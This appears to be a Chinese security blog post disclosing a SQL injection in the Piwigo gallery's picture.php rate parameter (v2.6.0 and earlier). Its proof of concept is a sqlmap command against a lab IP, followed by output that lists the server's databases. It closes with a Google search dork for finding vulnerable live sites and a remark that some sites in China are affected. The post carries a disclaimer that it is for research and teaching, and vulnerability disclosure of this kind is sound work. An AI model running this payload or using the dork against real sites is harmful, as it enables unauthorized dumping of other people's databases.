Piwigo是世界上最著名的免费开源相册系统之一,由PHP+MySQL架构。由于该框架搭建方便,受到国内外的开发者青睐,近日,Piwigo <= v2.6.0爆出重要0day漏洞。
漏洞成因,Piwigo相册系统的/piwigo/picture.php页面,没有完整的验证jQuery参数。攻击者成功利用该漏洞,可以获取数据库的全部信息,漏洞及其简单暴力。
漏洞影响范围,Piwigo <= v2.6.0。
漏洞POC 本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
/piwigo/picture.php?/1/category/1&action=rate (POST parameter: rate=1) Exploiting with SQLMap: python sqlmap.py -u "http://192.168.244.129/piwigo/picture.php?/1/category/1&action=rate"; --data "rate=1" --dbs [16:32:25] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 10.04 (Lucid Lynx) web application technology: PHP 5.3.2, Apache 2.2.14 back-end DBMS: MySQL 5 [16:32:25] [INFO] fetching database names [16:32:25] [INFO] fetching number of databases [16:32:25] [INFO] resumed: 4 [16:32:25] [INFO] resumed: information_schema [16:32:25] [INFO] resumed: mysql [16:32:25] [INFO] resumed: phpmyadmin [16:32:25] [INFO] resumed: piwigo available databases [4]: [*] information_schema [*] mysql [*] phpmyadmin [*] piwigo
国内部分网站受该漏洞影响,截图
Google关键字:inurl:piwigo/picture.php